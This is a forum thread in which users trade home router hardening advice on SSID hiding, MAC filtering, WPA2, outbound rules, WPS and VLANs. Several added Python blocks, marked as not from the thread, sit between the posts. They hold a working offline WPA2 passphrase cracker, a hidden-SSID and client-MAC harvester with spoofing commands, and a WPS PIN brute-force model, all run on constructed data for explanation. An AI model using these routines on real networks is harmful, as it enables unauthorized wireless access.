
Juggernaut
Irreverent or irrelevant?
Premium
join:2006-09-05
Kelowna, BC
kudos:2
reply to norwegian

Re: Router security

said by norwegian:

I'm gathering at some point if internally infected, an external computer that is communicating back and forth can spoof the internal MAC address and the router will then allow more communication? Not quite DMZ status but it would surely be close?

Even if you spoof a MAC to a 'known' device, if the router is secured, you still need to have the login, and PW to gain access to WIFI, or the router.

If it is not secured, and has only a MAC filter, you're toast. You can spoof a MAC with a program. WIFI (and Bluetooth) broadcasts them.
--
Better to have it and not need it, than need it and not have it.


StuartMW
Who Is John Galt?
Premium
join:2000-08-06
Galt's Gulch
kudos:2

2 edits
reply to norwegian

Sounds like you have an integrated modem/router from your ISP. My LAN is behind another 3rd party router. I don't trust what an ISP provides. That has been discussed here before (too lazy to find a link right now).

»Re: Do you trust AT&T with your security?
--
Don't feed trolls--it only makes them grow!



KodiacZiller
Premium
join:2008-09-04
73368
kudos:2

1 recommendation

reply to Shady Bimmer

said by Shady Bimmer:

WPA = Wi-Fi Protected Access, the next-generation security protocol after WEP. WPA has been deemed weak against brute-force attacks.

Only partially true. WPA only has weaknesses when used in TKIP mode. If you enable CCMP/AES mode, those weaknesses do not exist.
--
Getting people to stop using windows is more or less the same as trying to get people to stop smoking tobacco products. They don't want to change; they are happy with slowly dying inside. -- munky99999


Juggernaut
Irreverent or irrelevant?
Premium
join:2006-09-05
Kelowna, BC
kudos:2
reply to StuartMW

Yep, I have my own router, and my ISP's modem. The router is between them, and my network.
--
Better to have it and not need it, than need it and not have it.



norwegian
Premium
join:2005-02-15
Outback
reply to Shady Bimmer

said by Shady Bimmer:

The router/firewall is a layer of protection for the network, which itself is inherently insecure with many points of vulnerability.

Which I am learning more about from the discussion, even though it is the router that seems to be the centre of attention for me.

I didn't just want a "my bob2 is beeping it is infected" topic. These tend to be closed down rather quickly. So I tried a discussion in hopes I could view or review protocols to help understand more generally about setting up networks securely, from starting with locking down a router and using it to its full potential.

Sorry to all if I've misled you a little.
--
The only thing necessary for the triumph of evil is for good men to do nothing - Edmund Burke



norwegian
Premium
join:2005-02-15
Outback
reply to StuartMW

said by StuartMW:

Sounds like you have an integrated modem/router from your ISP. My LAN is behind another 3rd party router. I don't trust what an ISP provides. That has been discussed here before (too lazy to find a link right now).

»Re: Do you trust AT&T with your security?

It is a Bob2 supplied by the vendor.

I have another router here, but had troubles setting up the second router, or understanding what security needs to be in place with the addressing and configurations. We discussed piggybacking routers here once or twice and consensus was equally bad vs. good for this method. I doubt turning it into a bridge would help my wireless clients with protection.
--
The only thing necessary for the triumph of evil is for good men to do nothing - Edmund Burke



StuartMW
Who Is John Galt?
Premium
join:2000-08-06
Galt's Gulch
kudos:2
reply to norwegian

said by norwegian:

I didn't just want a "my bob2 is beeping it is infected" topic.

If it starts beeping rapidly I'd be inclined to, um, run.
--
Don't feed trolls--it only makes them grow!


Juggernaut
Irreverent or irrelevant?
Premium
join:2006-09-05
Kelowna, BC
kudos:2
reply to norwegian

One other thing to do, as it seems to have been missed. Use a SW FW as well, to stop stuff from going out. It's another layer for security.
--
Better to have it and not need it, than need it and not have it.



StuartMW
Who Is John Galt?
Premium
join:2000-08-06
Galt's Gulch
kudos:2

1 recommendation

And/or configure your own (custom) outgoing firewall rules in your router.
--
Don't feed trolls--it only makes them grow!



norwegian
Premium
join:2005-02-15
Outback
reply to Juggernaut

said by Juggernaut:

Even if you spoof a MAC to a 'known' device, if the router is secured, you still need to have the login, and PW to gain access to WIFI, or the router.

If it is not secured, and has only a MAC filter, you're toast. You can spoof a MAC with a program. WIFI (and Bluetooth) broadcasts them.

This is set up with a default SSID but the passphrase is my own.
--
The only thing necessary for the triumph of evil is for good men to do nothing - Edmund Burke



Juggernaut
Irreverent or irrelevant?
Premium
join:2006-09-05
Kelowna, BC
kudos:2

That's an important part.

But, if it's your telco's unit, they have a backdoor to reset it for access. Better to have your router in between it, and your network.
--
Better to have it and not need it, than need it and not have it.



StuartMW
Who Is John Galt?
Premium
join:2000-08-06
Galt's Gulch
kudos:2

said by Juggernaut:

But, if it's your telco's unit, they have a backdoor...

And if they do, so does ASIO/the NSA/et al. But if you have a "Bob2" that's a given.
--
Don't feed trolls--it only makes them grow!


norwegian
Premium
join:2005-02-15
Outback
reply to KodiacZiller

You have me a little curious on this.

said by KodiacZiller:

said by norwegian:


2. Hide SSID and only show it to allow the connection to happen before hiding it, use WPA2 as well.

Hiding the SSID has zero benefit.

Hiding the SSID does nothing?

said by KodiacZiller:

said by norwegian:

2. Set specific MAC addresses.

MAC filtering has little if any benefit.



Setting specific MAC address filtering is not worth a concern?
Can you elaborate on this, as setting MAC addressing was 1 of my "to do" jobs but you suggest I'm wasting my time, I gather because they can be spoofed?

said by KodiacZiller:

The best steps you can take to secure a router are:

1) Set a strong WPA2 password.

2) Turn off any remote administering of the router unless you really need it.

This I have done.
--
The only thing necessary for the triumph of evil is for good men to do nothing - Edmund Burke
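What "a strong WPA2 password" actually protects against is worth seeing in code. The following is an added example and not from this thread: the WPA2-PSK passphrase and SSID are stretched with PBKDF2 into the PMK, the PMK and the two handshake nonces give the PTK, and the first 16 bytes of the PTK (the KCK) produce the MIC on EAPOL message 2 of the 4-way handshake. Anyone who sniffs one handshake can therefore test passphrases offline at one PBKDF2 per guess, with no further contact with the router. The SSID, passphrase, MAC addresses, nonces and EAPOL bytes below are all constructed for the demonstration; only the standard library is used.

```python
"""
Added example, not from the thread: what a strong WPA2 passphrase buys
you. The PMK is PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32 bytes); an
attacker who sniffs one 4-way handshake can recompute the PTK for each
guess and compare the EAPOL message-2 MIC, entirely offline. SSID,
passphrase, MACs, nonces and the EAPOL bytes below are all constructed.
"""
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(pmk: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11 PRF-n: HMAC-SHA1(PMK, label || 0x00 || data || i), concatenated."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(pmk, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce):
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 48)   # CCMP: KCK | KEK | TK


def eapol_mic(kck: bytes, eapol_with_mic_zeroed: bytes) -> bytes:
    # Key descriptor version 2 (WPA2/AES): HMAC-SHA1 truncated to 16 bytes,
    # computed over the EAPOL-Key frame with the MIC field set to zero
    return hmac.new(kck, eapol_with_mic_zeroed, hashlib.sha1).digest()[:16]


# Constructed handshake parameters (nothing here comes from a real capture)
SSID, PASSPHRASE = "HomeNet", "correct horse battery"
AP_MAC = bytes.fromhex("020000000001")
STA_MAC = bytes.fromhex("0200000000aa")
ANONCE = hashlib.sha256(b"anonce-sample").digest()
SNONCE = hashlib.sha256(b"snonce-sample").digest()
# Stand-in for the EAPOL-Key message 2 body with its MIC field zeroed
EAPOL_M2_ZEROED = b"\x02\x03\x00\x5f\x02\x01\x0a\x00" + b"\x00" * 8 + SNONCE + b"\x00" * 48


def captured_mic() -> bytes:
    """What a sniffer records: the MIC the legitimate client put on message 2."""
    ptk = ptk_from_pmk(pmk_from_passphrase(PASSPHRASE, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    return eapol_mic(ptk[:16], EAPOL_M2_ZEROED)


def crack(wordlist, mic: bytes, ssid: str = SSID):
    """Offline dictionary attack: cost per guess is one PBKDF2 (4096 HMACs)."""
    for candidate in wordlist:
        ptk = ptk_from_pmk(pmk_from_passphrase(candidate, ssid), AP_MAC, STA_MAC, ANONCE, SNONCE)
        if hmac.compare_digest(eapol_mic(ptk[:16], EAPOL_M2_ZEROED), mic):
            return candidate
    return None


WORDLIST = ["password", "12345678", "HomeNet", "letmein", "correct horse battery"]  # constructed


if __name__ == "__main__":
    print(crack(WORDLIST, captured_mic()))
```

The only thing the attacker needs per guess is the PBKDF2 step, so the defence is passphrase entropy (a long random passphrase is outside any wordlist) and nothing about the cipher suite changes that arithmetic. Note also that the SSID is the PBKDF2 salt: a default or very common SSID lets precomputed PMK tables be reused across networks.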



norwegian
Premium
join:2005-02-15
Outback
reply to Juggernaut

said by Juggernaut:

One other thing to do, as it seems to have been missed. Use a SW FW as well, to stop stuff from going out. It's another layer for security.

said by StuartMW:

And/or configure your own (custom) outgoing firewall rules in your router.

I do have a firewall on all items, but to set serious filtering is a big task: software needs configuring, Microsoft services need configuring, etc., etc.

I hear just allowing UDP port 53 for DNS and UDP/TCP on port 80 for Internet is a good start.

Still it is not a simple 5 minute job either?
--
The only thing necessary for the triumph of evil is for good men to do nothing - Edmund Burke
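The outbound rules mentioned above are easier to reason about as a small default-deny policy than as a list of ports. The following is an added example, not from this thread or anyone's actual configuration: a first-match egress policy for a home router, evaluated against constructed sample flows, and the same policy rendered as an nftables forward chain with logging on the drops so the syslog server mentioned elsewhere in the thread has something to show. The LAN range, the upstream resolver address and the port list are assumptions for illustration; it assumes web traffic is TCP on 80 and 443, and it pins DNS to one chosen resolver because "UDP 53 to anywhere" is the classic tunnel and exfiltration channel.

```python
"""
Added example, not from the thread: a default-deny outbound (egress)
policy for a home router, checked against constructed sample flows and
rendered as an nftables chain. LAN range, resolver and port list are
assumptions for illustration, not anyone's real configuration.
"""
import ipaddress

LAN = ipaddress.ip_network("192.168.1.0/24")            # assumed LAN
RESOLVER = ipaddress.ip_network("203.0.113.53/32")      # assumed upstream resolver

# (proto, dst port or None, dst network or None, verdict); first match wins
POLICY = [
    ("udp", 53, RESOLVER, "accept"),   # DNS, but only to the resolver we chose
    ("udp", 53, None, "drop"),         # DNS to anyone else: likely tunnelling/exfil
    ("tcp", 80, None, "accept"),       # HTTP
    ("tcp", 443, None, "accept"),      # HTTPS
    ("udp", 123, None, "accept"),      # NTP
]
DEFAULT_VERDICT = "drop"


def evaluate(flow, policy=POLICY):
    """Verdict for a *new* flow given as dict(src, dst, proto, dport).
    Return traffic (conntrack established/related) is outside this model."""
    src = ipaddress.ip_address(flow["src"])
    dst = ipaddress.ip_address(flow["dst"])
    if src not in LAN:
        return "drop"                  # unsolicited inbound never matches an egress rule
    for proto, dport, net, verdict in policy:
        if proto != flow["proto"]:
            continue
        if dport is not None and dport != flow["dport"]:
            continue
        if net is not None and dst not in net:
            continue
        return verdict
    return DEFAULT_VERDICT


def render_nft(policy=POLICY):
    """The same policy as an nftables forward chain; drops are logged."""
    lines = [
        "table inet filter {",
        "  chain forward {",
        "    type filter hook forward priority 0; policy drop;",
        "    ct state established,related accept",
        f"    ip saddr != {LAN} drop",
    ]
    for proto, dport, net, verdict in policy:
        parts = [f"ip daddr {net}"] if net is not None else []
        parts.append(f"{proto} dport {dport}" if dport is not None else proto)
        if verdict == "drop":
            parts.append('log prefix "egress-drop "')
        lines.append("    " + " ".join(parts) + " " + verdict)
    lines += ['    log prefix "egress-default-drop " drop', "  }", "}"]
    return "\n".join(lines)


# Constructed sample flows, not real traffic
SAMPLE_FLOWS = [
    {"src": "192.168.1.20", "dst": "203.0.113.53", "proto": "udp", "dport": 53},
    {"src": "192.168.1.20", "dst": "198.51.100.7", "proto": "tcp", "dport": 443},
    {"src": "192.168.1.20", "dst": "198.51.100.9", "proto": "udp", "dport": 53},    # rogue resolver
    {"src": "192.168.1.20", "dst": "198.51.100.7", "proto": "udp", "dport": 80},    # not web traffic
    {"src": "192.168.1.20", "dst": "198.51.100.7", "proto": "tcp", "dport": 6667},  # IRC-style C2
    {"src": "198.51.100.9", "dst": "192.168.1.20", "proto": "tcp", "dport": 3389},  # inbound probe
]


def audit(flows=SAMPLE_FLOWS, policy=POLICY):
    return [evaluate(f, policy) for f in flows]


if __name__ == "__main__":
    for flow, verdict in zip(SAMPLE_FLOWS, audit()):
        print(f"{verdict:6} {flow['src']} -> {flow['dst']} {flow['proto']}/{flow['dport']}")
    print(render_nft())
```

Two things the sample flows make visible: a UDP/80 allow buys nothing for web browsing but opens a channel, and an unrestricted UDP/53 allow lets any host on the LAN talk to any resolver on the Internet, which is exactly how DNS tunnelling malware gets out. The rendered chain is a starting point to paste into `nft -f`, not a finished ruleset; anything the household actually uses (mail, games, VPN) needs its own explicit line, which is the one-time effort StuartMW describes later.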



norwegian
Premium
join:2005-02-15
Outback
reply to Juggernaut

said by Juggernaut:

That's an important part.

But, if it's your telco's unit, they have a backdoor to reset it for access. Better to have your router in between it, and your network.

So I should have set up my own router and wireless access point and not gone the path of "bundled package". Even if it does leave me to diagnose my own hardware which I think isn't a hard task.
--
The only thing necessary for the triumph of evil is for good men to do nothing - Edmund Burke



Juggernaut
Irreverent or irrelevant?
Premium
join:2006-09-05
Kelowna, BC
kudos:2

Yes. I have my own router, and my ISP's modem. And no, it's not a hard task.
--
Better to have it and not need it, than need it and not have it.



KodiacZiller
Premium
join:2008-09-04
73368
kudos:2
reply to norwegian

said by norwegian:

Hiding the SSID does nothing?

Absolutely nothing. Any war-driver with Backtrack can sniff hidden SSIDs by default. Just about all war-driving software on any platform can do it.

said by norwegian:

Setting specific MAC address filtering is not worth a concern?
Can you elaborate on this, as setting MAC addressing was 1 of my "to do" jobs but you suggest I'm wasting my time, I gather because they can be spoofed?



What happens is an attacker will sit outside and use a tool like Ethereal to sniff the traffic on your network. While he can't actually see the data (since it is encrypted) he can see other information like the MAC addresses of clients. So, once he determines what the legit MAC addresses are, he runs a tool like ifconfig and changes his own MAC to match yours. It's trivial and only takes a minute.
--
Getting people to stop using windows is more or less the same as trying to get people to stop smoking tobacco products. They don't want to change; they are happy with slowly dying inside. -- munky99999
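Both points in the post above (a hidden SSID only disappears from beacons, and the addresses a MAC filter checks travel in the clear on every frame) can be shown with a few dozen lines of parsing. The following is an added example and not from this thread: a minimal 802.11 frame parser run over a constructed capture of one hidden-SSID beacon, one probe response and two encrypted data frames. The BSSID, client MAC, network name and frame bytes are all invented for the demonstration, and only the Python standard library is used.

```python
"""
Added example, not from the thread: why a hidden SSID and a MAC
allow-list give no real protection. Parses raw 802.11 frames built
inline (a constructed sample capture, not real traffic).
"""
import struct

AP_BSSID = "02:00:00:00:00:01"        # constructed addresses
CLIENT = "02:00:00:00:00:aa"
BROADCAST = "ff:ff:ff:ff:ff:ff"
REAL_SSID = b"HomeNet"                # constructed network name


def mac_bytes(s):
    return bytes(int(x, 16) for x in s.split(":"))


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def mgmt_frame(subtype, dst, src, bssid, ssid):
    # Frame Control: subtype in the high nibble, type 0 (management), no flags
    hdr = bytes([subtype << 4, 0x00]) + b"\x00\x00"
    hdr += mac_bytes(dst) + mac_bytes(src) + mac_bytes(bssid) + b"\x00\x00"
    # Fixed fields: timestamp, beacon interval, capability (privacy bit set)
    body = b"\x00" * 8 + struct.pack("<HH", 100, 0x0411)
    body += bytes([0, len(ssid)]) + ssid          # SSID IE (id 0); empty when "hidden"
    body += bytes([1, 1, 0x82])                   # Supported rates IE (id 1)
    return hdr + body


def data_frame(to_ds, addr1, addr2, addr3):
    # type 2 (data); flag bits ToDS=0x01, FromDS=0x02, Protected=0x40
    flags = (0x01 if to_ds else 0x02) | 0x40
    hdr = bytes([2 << 2, flags]) + b"\x00\x00"
    hdr += mac_bytes(addr1) + mac_bytes(addr2) + mac_bytes(addr3) + b"\x00\x00"
    return hdr + b"\xde\xad\xbe\xef" * 4           # stand-in for the encrypted payload


def parse(frame):
    fc0, flags = frame[0], frame[1]
    info = {"type": (fc0 >> 2) & 3, "subtype": fc0 >> 4,
            "to_ds": bool(flags & 1), "from_ds": bool(flags & 2),
            "addr1": mac_str(frame[4:10]), "addr2": mac_str(frame[10:16]),
            "addr3": mac_str(frame[16:22])}
    if info["type"] == 0 and info["subtype"] in (5, 8):   # probe response / beacon
        pos, ies = 24 + 12, {}                           # header + fixed fields
        while pos + 2 <= len(frame):
            eid, ln = frame[pos], frame[pos + 1]
            ies[eid] = frame[pos + 2:pos + 2 + ln]
            pos += 2 + ln
        info["ssid"] = ies.get(0, b"").decode(errors="replace")
    return info


def recover_ssid(frames, bssid):
    """A hidden AP beacons an empty SSID, but its probe responses (and the
    clients' association requests) carry the name in the clear."""
    for f in map(parse, frames):
        if f["type"] == 0 and f["addr3"] == bssid and f.get("ssid"):
            return f["ssid"]
    return None


def harvest_client_macs(frames, bssid):
    """Client addresses sit in the unencrypted header of every data frame."""
    clients = set()
    for f in map(parse, frames):
        if f["type"] != 2:
            continue
        if f["to_ds"] and f["addr1"] == bssid:
            clients.add(f["addr2"])        # source address
        elif f["from_ds"] and f["addr2"] == bssid:
            clients.add(f["addr1"])        # destination address
    return clients


def mac_filter_allows(allow_list, frame):
    """All the AP's MAC filter ever sees is the claimed source address."""
    f = parse(frame)
    return f["to_ds"] and f["addr2"] in allow_list


# Constructed capture: hidden beacon, probe response, two encrypted data frames
CAPTURE = [
    mgmt_frame(8, BROADCAST, AP_BSSID, AP_BSSID, b""),         # beacon, SSID "hidden"
    mgmt_frame(5, CLIENT, AP_BSSID, AP_BSSID, REAL_SSID),      # probe response
    data_frame(True, AP_BSSID, CLIENT, "02:00:00:00:00:02"),   # client -> AP
    data_frame(False, CLIENT, AP_BSSID, "02:00:00:00:00:02"),  # AP -> client
]


def demo():
    ssid = recover_ssid(CAPTURE, AP_BSSID)
    clients = harvest_client_macs(CAPTURE, AP_BSSID)
    # The attacker copies a harvested MAC into Addr2, which is all
    # `ifconfig wlan0 hw ether ...` or `ip link set dev wlan0 address ...` does
    spoofed = data_frame(True, AP_BSSID, sorted(clients)[0], "02:00:00:00:00:02")
    return ssid, clients, mac_filter_allows({CLIENT}, spoofed)


if __name__ == "__main__":
    print(demo())
```

The beacon parses with an empty SSID, the probe response gives the name back, and the data frames give up the client address even though their payload is encrypted; the filter then accepts the spoofed frame because it has no way to tell the two senders apart. That is the whole argument for spending the effort on WPA2 and the passphrase rather than on these two settings.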


norwegian
Premium
join:2005-02-15
Outback


Okay, this is where "Security by Obscurity" comes into play - if your firewall is pingable or not really makes no difference to the end result. Hidden or not you have to be trackable to some extent (without talking proxies).



norwegian
Premium
join:2005-02-15
Outback
reply to KodiacZiller

said by KodiacZiller:

said by norwegian:

Hiding the SSID does nothing?

Absolutely nothing. Any war-driver with Backtrack can sniff hidden SSIDs by default. Just about all war-driving software on any platform can do it.

Interesting that you brought this up.

Found this interesting:

»www.youtube.com/watch?v=xuO5X1KlPDE

--
The only thing necessary for the triumph of evil is for good men to do nothing - Edmund Burke



Juggernaut
Irreverent or irrelevant?
Premium
join:2006-09-05
Kelowna, BC
kudos:2
reply to norwegian

I make my router pingable. Why wouldn't I? It doesn't make a difference, anymore than hiding the SSID would. And, that is none.
--
Better to have it and not need it, than need it and not have it.



norwegian
Premium
join:2005-02-15
Outback
reply to Juggernaut

said by Juggernaut:

Yes. I have my own router, and my ISP's modem. And no, it's not a hard task.

I guess my problem is:

Modem is broken, invested in an all-in-one - Bob2

I have an old modem Netcomm 4+ replaced with Dlink (started playing up) to work with. I also have a Belkin wireless router and a plain router.

Maybe I need to revisit using the old gear or turning off the wireless in Bob2 and making it a bridge to the next router. Bit of playing around but might be worth looking at.

Whether it stops the beeps who knows, but this Bob2 modem/wireless router does have a beep no other hardware had.
Guess I need to test electrical currents to see if there is an issue for the hardware there.
--
The only thing necessary for the triumph of evil is for good men to do nothing - Edmund Burke



StuartMW
Who Is John Galt?
Premium
join:2000-08-06
Galt's Gulch
kudos:2

2 edits
reply to norwegian

said by norwegian:

Still it is not a simple 5 minute job either?

No it isn't. It's up to you as to how serious you want to be about security.

I don't know how many people configure their own firewall(s), incoming and outgoing, but I've been doing it since getting my first (non-integrated) router in 2000 or so.

I bought and read this book as a guide.

Building Internet Firewalls

Also I have a Syslog server that logs stuff. Again it's up to you how far you want to go but most of the effort is one-time.
--
Don't feed trolls--it only makes them grow!


StuartMW
Who Is John Galt?
Premium
join:2000-08-06
Galt's Gulch
kudos:2
reply to norwegian

said by norwegian:

Okay, this is where "Security by Obscurity" comes into play...

There's no such thing on the internet. It doesn't matter where you live, New York city or a shack in Siberia, you will be found.
--
Don't feed trolls--it only makes them grow!


StuartMW
Who Is John Galt?
Premium
join:2000-08-06
Galt's Gulch
kudos:2
reply to norwegian

BTW this whole thread has got me thinking about what devices I have on wi-fi. With a little bit of work (hardware + firewall setup) I could make some of them hardwired (cabled). That'd just decrease the probability that they could be reached.
--
Don't feed trolls--it only makes them grow!



workablob

join:2004-06-09
Houston, TX
kudos:2
reply to norwegian

Disable WPS if you can.

Linksys gives the illusion of allowing one to disable it but it is just an illusion.

DD-WRT will let you do it.

Dave
--
I may have been born yesterday. But it wasn't at night.



StuartMW
Who Is John Galt?
Premium
join:2000-08-06
Galt's Gulch
kudos:2

said by workablob:

Disable WPS if you can.

Agreed. WPS is broken.

»WiFi Protected Setup PIN brute force vulnerability

Fortunately my (older) router doesn't support WPS.
--
Don't feed trolls--it only makes them grow!
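Why the PIN brute force linked above is practical rather than a 10^8 guess problem comes down to two design choices in WPS: the eighth PIN digit is a checksum of the first seven, and the registrar answers the first half of the PIN (in its reply to message M4) before the second half is ever checked. The following is an added example, not from this thread or the linked advisory: the checksum routine, the resulting search-space arithmetic, and a simplified model of the registrar's leak driven by a half-at-a-time brute force. The registrar is a local stand-in for illustration, not a network client, and the PIN "12345670" is just a checksum-valid sample.

```python
"""
Added example, not from the thread: why the WPS PIN is brute-forceable.
The 8th digit is a checksum of the first seven, and the registrar
confirms the first four digits independently of the last three, so the
effective search space is 10^4 + 10^3 instead of 10^8. ModelRegistrar
is a simplified stand-in for that behaviour, not a network client.
"""


def wps_checksum(first7: int) -> int:
    """Checksum digit for a 7-digit WPS PIN body (the algorithm hostapd uses)."""
    accum = 0
    while first7:
        accum += 3 * (first7 % 10)
        first7 //= 10
        accum += first7 % 10
        first7 //= 10
    return (10 - accum % 10) % 10


def pin_is_valid(pin: str) -> bool:
    return len(pin) == 8 and pin.isdigit() and wps_checksum(int(pin[:7])) == int(pin[7])


def search_space():
    """Candidate counts: naive, knowing the checksum, and with the split oracle."""
    return {"naive": 10 ** 8, "checksum_only": 10 ** 7, "split_halves": 10 ** 4 + 10 ** 3}


class ModelRegistrar:
    """Models the information leak: the reply after M4 reveals whether the
    first half is right before the second half is ever checked."""

    def __init__(self, pin: str):
        assert pin_is_valid(pin)
        self._pin = pin
        self.attempts = 0

    def first_half_ok(self, half: str) -> bool:
        self.attempts += 1
        return half == self._pin[:4]

    def pin_ok(self, pin: str) -> bool:
        self.attempts += 1
        return pin == self._pin


def brute_force(reg: ModelRegistrar):
    """Recover the PIN half by half; returns (pin, attempts) or (None, attempts)."""
    first = next((f"{a:04d}" for a in range(10_000) if reg.first_half_ok(f"{a:04d}")), None)
    if first is None:
        return None, reg.attempts
    for b in range(1000):
        seven = first + f"{b:03d}"
        pin = seven + str(wps_checksum(int(seven)))   # only checksum-valid PINs are tried
        if reg.pin_ok(pin):
            return pin, reg.attempts
    return None, reg.attempts


if __name__ == "__main__":
    print(brute_force(ModelRegistrar("12345670")), search_space())
```

Eleven thousand attempts is a few hours against a router that does not rate-limit or lock out after failures, which is why the advice in this thread is to disable WPS outright rather than rely on the PIN, and why verifying that the "disabled" switch actually stops the registrar from answering matters.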


rcdailey
Dragoonfly
Premium
join:2005-03-29
Rialto, CA
Reviews:
·Time Warner Cable
reply to StuartMW

Yeah, everything I've read says that hiding SSID is useless. I have done it only to keep casual users from trying to connect, but that probably just ensures that the only attempts will be malicious or non-casual. The router wifi is secured anyway with a strong password in WPA2 and also the administrator name and password are unique and remote administration is disabled. There's really no need for remote administration for most people, anyway, is there?

The key remains LAN access, doesn't it. How does one log onto the LAN, users and user levels, passwords, etc? If it is easy to log onto the LAN locally, then once the wifi connection and strong password are known, logging onto the LAN will also be easy, won't it?
--
It is easier for a camel to put on a bikini than an old man to thread a needle.



rcdailey
Dragoonfly
Premium
join:2005-03-29
Rialto, CA
Reviews:
·Time Warner Cable
reply to StuartMW

I have a really old D-Link at home that is not wireless, so I don't have to worry about that one, at least when it comes to WPS. I have verified that the wireless router at an office I have some responsibility for is not vulnerable to that attack because it does not support WPS.
--
It is easier for a camel to put on a bikini than an old man to thread a needle.



EGeezer
Go Cats
Premium
join:2002-08-04
Midwest
kudos:8
Reviews:
·Callcentric

1 recommendation

reply to norwegian

I suggest investigating VLANs as a possible security feature. It essentially lets you define specific paths between specific points and a trunk connection to border routers or shared printers. Since VLAN switches provide layer 2 data link level switching, they are impervious to many of the LAN side malware spreading exploits extant today.

Configuration isn't a trivial matter, but once it's set up, it's low maintenance.

Here are a couple of educational links to review the subject:

»computer.howstuffworks.com/lan-switch15.htm

See »www.cisco.com/web/about/ac123/ac···ion.html

For a nice discussion on wireless router hardening, see
»Harden your router/AP in five steps



StuartMW
Who Is John Galt?
Premium
join:2000-08-06
Galt's Gulch
kudos:2

said by EGeezer:

I suggest investigating VLANs as a possible security feature.

That's what I'm considering doing as my router supports VLANs.

But as you said it's not trivial to configure and I want to think about the implications (what can talk to what etc) before I dive in.
--
Don't feed trolls--it only makes them grow!